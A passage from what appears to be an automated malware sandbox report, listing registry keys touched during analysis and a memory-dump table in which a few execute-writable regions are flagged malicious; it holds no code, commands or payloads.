HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@sendmail.dll,-21
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@zipfldr.dll,-10148
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@sendmail.dll,-4
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@C:\Windows\system32\FXSRESM.dll,-120
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ScT\OpenWithProgids
scriptletfile
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3017
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3018
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{06290BD2-48AA-11D2-8432-006008C3FBFC} {00000112-0000-0000-C000-000000000046} 0x5
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\WFS.exe
 clean
HKEY_CURRENT_USER\Software\Microsoft\GDIPlus
FontCachePath
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\36A57
36A57
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\36A57
36A57
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
 clean
There are 339 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
23B1000
unkown
page read and write
 malicious
32AD000
unkown
page read and write
 malicious
402000
unkown
page execute and read and write
 malicious
402000
unkown
page execute and read and write
 malicious
239B000
unkown
page read and write
 malicious
402000
unkown
page execute and read and write
 malicious
402000
unkown
page execute and read and write
 malicious
240A000
unkown
page read and write
 malicious
22AF000
unkown
page read and write
 malicious
402000
unkown
page execute and read and write
 malicious
7FFFFFB2000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
5FCE000
stack
page read and write
 clean
2850000
unkown
page read and write
 clean
1DE0000
heap private
page execute and read and write
 clean
520000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
314C000
unkown
page read and write
 clean
526000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
10000
unkown image
page read and write
 clean
2190000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
21F0000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
23D000
stack
page read and write
 clean
A5E000
stack
page read and write
 clean
25AB000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
4E5000
unkown
page read and write
 clean
437000
heap default
page read and write
 clean
7FF00220000
unkown
page execute and read and write
 clean
4E0000
unkown
page read and write
 clean
306D000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
27B0000
unkown image
page readonly
 clean
2C94000
unkown
page read and write
 clean
BE0000
unkown
page execute and read and write
 clean
D6E000
unkown image
page readonly
 clean
5A3E000
stack
page read and write
 clean
23C4000
heap private
page read and write
 clean
4810000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
1E80000
unkown
page read and write
 clean
593E000
stack
page read and write
 clean
1D80000
unkown
page read and write
 clean
282000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
4E0000
unkown
page read and write
 clean
29F0000
heap private
page execute and read and write
 clean
B90000
unkown
page read and write
 clean
1AB0000
unkown
page read and write
 clean
B80000
unkown image
page readonly
 clean
7EFB0000
unkown image
page readonly
 clean
D6E000
unkown image
page readonly
 clean
23E2000
heap private
page read and write
 clean
3AF000
heap default
page read and write
 clean
CF0000
unkown image
page readonly
 clean
3220000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
6851000
unkown
page read and write
 clean
4F36000
heap private
page read and write
 clean
7C8000
heap private
page read and write
 clean
3124000
unkown
page read and write
 clean
21B2000
heap private
page read and write
 clean
5C9000
heap default
page read and write
 clean
7FF001A0000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
6331000
unkown
page read and write
 clean
7E0000
unkown
page read and write
 clean
510000
unkown image
page readonly
 clean
10000
unkown image
page read and write
 clean
A70000
unkown
page read and write
 clean
685B000
unkown
page read and write
 clean
2FA1000
unkown
page read and write
 clean
400000
unkown
page execute and read and write
 clean
5C4C000
stack
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
554000
heap default
page read and write
 clean
21A0000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
352B000
unkown
page read and write
 clean
3A0B000
unkown
page read and write
 clean
480E000
stack
page read and write
 clean
7FFFFF10000
unkown
page execute and read and write
 clean
3169000
unkown
page read and write
 clean
2240000
stack
page read and write
 clean
2C90000
unkown
page read and write
 clean
5D6E000
stack
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
4E40000
unkown image
page readonly
 clean
2E8000
unkown
page read and write
 clean
3A24000
unkown
page read and write
 clean
303D000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
178000
heap default
page read and write
 clean
250000
unkown
page execute and read and write
 clean
B60000
unkown
page read and write
 clean
311C000
unkown
page read and write
 clean
52A0000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
807000
heap private
page read and write
 clean
BE0000
unkown
page read and write
 clean
1B4A7000
unkown
page read and write
 clean
284E000
stack
page read and write
 clean
520000
unkown
page read and write
 clean
74F2000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
2850000
unkown
page read and write
 clean
7FF001B0000
unkown
page execute and read and write
 clean
4E5000
unkown
page read and write
 clean
7FF00100000
unkown
page read and write
 clean
960000
unkown image
page readonly
 clean
8B9E000
unkown
page read and write
 clean
B00000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
480000
unkown image
page readonly
 clean
5270000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
7FF0003A000
unkown
page execute and read and write
 clean
7B0000
unkown image
page readonly
 clean
1C980000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
CF2000
unkown image
page execute read
 clean
4E0000
unkown
page read and write
 clean
6B0C000
stack
page read and write
 clean
86A000
heap default
page read and write
 clean
3149000
unkown
page read and write
 clean
5D0000
unkown image
page readonly
 clean
5BB000
unkown
page read and write
 clean
30000
unkown image
page readonly
 clean
2400000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
20000
unkown
page read and write
 clean
580000
heap private
page read and write
 clean
1C24000
heap private
page read and write
 clean
520000
unkown
page read and write
 clean
1CB0000
unkown image
page readonly
 clean
A73000
unkown
page read and write
 clean
1F5B000
heap private
page read and write
 clean
CF2000
unkown image
page execute read
 clean
525000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
30F7000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
3B0D000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
B80000
unkown
page read and write
 clean
30FA000
unkown
page read and write
 clean
21A0000
unkown
page read and write
 clean
2FF0000
unkown
page read and write
 clean
4952000
heap private
page read and write
 clean
4E0000
unkown
page read and write
 clean
631E000
stack
page read and write
 clean
26F0000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
7FF00207000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
AD2000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
B50000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
496000
unkown
page read and write
 clean
2BE0000
unkown
page read and write
 clean
2DCF000
unkown
page read and write
 clean
3B09000
unkown
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
3C0000
unkown image
page readonly
 clean
1EC0000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
540C000
stack
page read and write
 clean
5A2E000
stack
page read and write
 clean
4F18000
heap private
page read and write
 clean
2B70000
unkown
page read and write
 clean
21A0000
heap private
page read and write
 clean
7FF00270000
unkown
page execute and read and write
 clean
292000
unkown
page read and write
 clean
2AD4000
heap private
page read and write
 clean
3A0000
unkown
page execute and read and write
 clean
307D000
unkown
page read and write
 clean
311E000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
5B4000
heap private
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
8D9000
heap default
page read and write
 clean
2850000
unkown
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
2250000
stack
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
2240000
stack
page read and write
 clean
2CC0000
unkown image
page readonly
 clean
2FF2000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
7EFD0000
unkown image
page readonly
 clean
AD0000
unkown
page read and write
 clean
276000
unkown
page read and write
 clean
1C80E000
stack
page read and write
 clean
43C7000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
A70000
unkown
page read and write
 clean
2FFA000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
520000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
827000
heap default
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
570000
unkown image
page readonly
 clean
590000
unkown image
page readonly
 clean
C96000
unkown
page read and write
 clean
4E6000
unkown
page read and write
 clean
3267000
unkown
page read and write
 clean
C6E000
stack
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
520000
unkown
page read and write
 clean
21A0000
unkown
page read and write
 clean
2180000
unkown image
page readonly
 clean
4830000
heap private
page read and write
 clean
288F000
stack
page read and write
 clean
368E000
unkown
page read and write
 clean
2E0000
unkown
page read and write
 clean
227000
heap default
page read and write
 clean
CF2000
unkown image
page execute read
 clean
36A5000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
1ADC0000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
30DA000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
ABE000
stack
page read and write
 clean
4E5000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
2850000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
AF1000
unkown
page read and write
 clean
36CE000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
12D91000
unkown
page read and write
 clean
274000
heap private
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
366F000
unkown
page read and write
 clean
5D90000
unkown image
page readonly
 clean
3041000
unkown
page read and write
 clean
38C2000
unkown
page read and write
 clean
3322000
unkown
page read and write
 clean
F3000
unkown
page execute and read and write
 clean
4E5000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
700000
unkown image
page readonly
 clean
380000
unkown image
page readonly
 clean
810000
unkown image
page read and write
 clean
4E0000
unkown
page read and write
 clean
1B4DA000
unkown
page read and write
 clean
3ABF000
unkown
page read and write
 clean
40000
unkown image
page readonly
 clean
577E000
stack
page read and write
 clean
1C980000
unkown
page read and write
 clean
27CE000
stack
page read and write
 clean
A70000
unkown
page read and write
 clean
24ED000
unkown
page read and write
 clean
3074000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
1CB5E000
stack
page read and write
 clean
2FCA000
unkown
page read and write
 clean
321C000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
3AD2000
unkown
page read and write
 clean
560000
unkown image
page readonly
 clean
D6E000
unkown image
page readonly
 clean
4870000
unkown
page read and write
 clean
357A000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
34C5000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
522000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
3119000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
270000
heap private
page read and write
 clean
36B8000
unkown
page read and write
 clean
2260000
stack
page read and write
 clean
360000
heap default
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
520000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
368000
heap default
page read and write
 clean
7FF0004C000
unkown
page execute and read and write
 clean
A70000
unkown
page read and write
 clean
3A85000
unkown
page read and write
 clean
3E9000
heap default
page read and write
 clean
286000
unkown
page execute and read and write
 clean
368C000
unkown
page read and write
 clean
450000
heap default
page read and write
 clean
30A8000
unkown
page read and write
 clean
4570000
unkown image
page readonly
 clean
3539000
unkown
page read and write
 clean
1E65000
heap private
page read and write
 clean
7FF00190000
unkown
page execute and read and write
 clean
7F0000
unkown image
page readonly
 clean
26F0000
unkown
page read and write
 clean
3F8000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
590D000
stack
page read and write
 clean
2F8F000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
60000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
2FAE000
unkown
page read and write
 clean
3705000
unkown
page read and write
 clean
4A20000
heap private
page read and write
 clean
520000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
32CD000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
36B5000
unkown
page read and write
 clean
1B947000
unkown
page read and write
 clean
1B8C0000
unkown
page read and write
 clean
7FF001E0000
unkown
page read and write
 clean
7ADF000
stack
page read and write
 clean
23AF000
stack
page read and write
 clean
26F0000
unkown
page read and write
 clean
3AA6000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
720000
unkown image
page readonly
 clean
1B66D000
stack
page read and write
 clean
3034000
unkown
page read and write
 clean
3F0000
unkown
page read and write
 clean
CB0000
heap private
page execute and read and write
 clean
368B000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
3B48000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
14B000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
4E0000
unkown
page read and write
 clean
B10000
heap private
page execute and read and write
 clean
4E0000
unkown
page read and write
 clean
568E000
stack
page read and write
 clean
760000
unkown image
page readonly
 clean
62F3000
unkown
page read and write
 clean
57E000
heap default
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
38AE000
unkown
page read and write
 clean
310A000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
5270000
unkown
page execute and read and write
 clean
15D000
unkown
page read and write
 clean
7FF00260000
unkown
page execute and read and write
 clean
310E000
unkown
page read and write
 clean
75A6000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
28BA000
